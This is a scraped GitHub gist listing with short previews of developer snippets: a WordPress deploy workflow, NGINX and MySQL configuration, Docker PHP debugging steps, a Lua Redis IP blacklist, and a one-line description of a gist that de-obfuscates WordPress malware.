Alexis madrzejewski

@webaxones
webaxones / deploy.yml
Last active August 31, 2024 21:48
GitHub workflow to build a WordPress Bedrock site and deploy it to a shared server using SSH
# This GitHub workflow will build a WordPress Bedrock site and deploy it to a shared server (French one: O2Switch, but URLs can be adapted) using SSH
# Actions secrets are used to store sensitive information:
# - SSH_PRIVATE_KEY: The private key used to authenticate with the remote server
# - REMOTE_HOST: The hostname of the remote server
# - REMOTE_USER: The username used to authenticate with the remote server
# - REMOTE_PROD_TARGET: The path on the remote server where the site will be deployed to
# - REMOTE_PREPROD_TARGET: The path on the remote server where the site will be deployed to
# - URL_ENCODED_PASSWORD: The password used to authenticate with the remote server, URL encoded (e.g. using https://www.urlencoder.org/)
# Workflow triggers on pushes to the develop and master branches:
# - On the develop branch, the site is deployed to the preprod target
@mrbrainz
mrbrainz / Exploited Wordpress Index File - Sitemap Malware
Last active March 23, 2024 09:40
Unobfuscation of a complicated malware that uses fake XML sitemaps for blackhat SEO. This code was being injected into 2 of my WordPress sites' index.php files every 2 days. I couldn't find where the security hole is, but the code was always the same. I spent time going through and unobfuscating by hand, as no online tool I could find would decod…
@itamarhaber
itamarhaber / some_thoughts.md
Created February 23, 2018 19:18
Some thoughts about "Building a sliding window rate limiter with Redis"

Reading Building a sliding window rate limiter with Redis, and w/o addressing the actual logic (which may or may not work).

Optimize by:

  1. Lua seems a much better choice: idempotent, portable, server-side, less bandwidth, atomic...
  2. The call to ZRANGEBYSCORE seems to be unused, should be commented out if so
  3. Looking at the use of ZRANGE, it appears that ZCARD is what's actually needed

The (untested) Lua snippet:

@sh41
sh41 / 01 Create a debug version of the docker image.sh
Last active April 16, 2024 10:08
Debugging segmentation faults in PHP in a docker container.
git clone git@github.com:docker-library/php.git docker-library-php
## Go to the specific version you're interested in
cd docker-library-php/7.1/fpm/alpine
## Edit the .Dockerfile.
## Change
## ENV PHP_EXTRA_CONFIGURE_ARGS --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data
## to
## ENV PHP_EXTRA_CONFIGURE_ARGS --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --enable-debug
## Comment out or delete:
@neilstuartcraig
neilstuartcraig / nginx-boringssl-build-script-debian.sh
Last active September 21, 2024 10:41
This builds NGINX from source with BoringSSL for Debian (alike?) systems with systemd (e.g. Debian Jessie)
#!/bin/bash
LATESTNGINX="1.11.10"
BUILDROOT="/tmp/boring-nginx"
# Pre-req
sudo apt-get update
sudo apt-get upgrade -y
# Install deps
@fevangelou
fevangelou / my.cnf
Last active September 21, 2024 22:10
Optimized my.cnf configuration for MySQL/MariaDB (on Ubuntu, CentOS, Almalinux etc. servers)
# === Optimized my.cnf configuration for MySQL/MariaDB (on Ubuntu, CentOS, Almalinux etc. servers) ===
#
# by Fotis Evangelou, developer of Engintron (engintron.com)
#
# ~ Updated December 2021 ~
#
#
# The settings provided below are a starting point for a 8-16 GB RAM server with 4-8 CPU cores.
# If you have different resources available you should adjust accordingly to save CPU, RAM & disk I/O usage.
#
@smerrill
smerrill / gist:10544237
Last active August 4, 2023 12:26
Socket Activation Notes
Socket activation:
NGINX=3:4
ListenStream=10646 (IPv6)
ListenStream=0.0.0.0:10646 (IPv4)
BindIPv6Only=ipv6-only
nginx.conf:
server {
@chrisboulton
chrisboulton / ip_blacklist.lua
Last active September 19, 2024 15:42
Redis based IP blacklist for Nginx (LUA)
-- a quick LUA access script for nginx to check IP addresses against an
-- `ip_blacklist` set in Redis, and if a match is found send a HTTP 403.
--
-- allows for a common blacklist to be shared between a bunch of nginx
-- web servers using a remote redis instance. lookups are cached for a
-- configurable period of time.
--
-- block an ip:
-- redis-cli SADD ip_blacklist 10.1.1.1
-- remove an ip:
@nichtich
nichtich / README.md
Last active July 19, 2024 11:21 — forked from oodavid/README.md
How to automatically deploy from GitHub

Deploy your site with git

This gist assumes:

  • you have an online remote repository (github / bitbucket etc.)
  • you have a local git repo
  • and a cloud server (Rackspace cloud / Amazon EC2 etc)
    • your (PHP) scripts are served from /var/www/html/
    • your webpages are executed by Apache
  • the Apache user is named www-data (may be apache on other systems)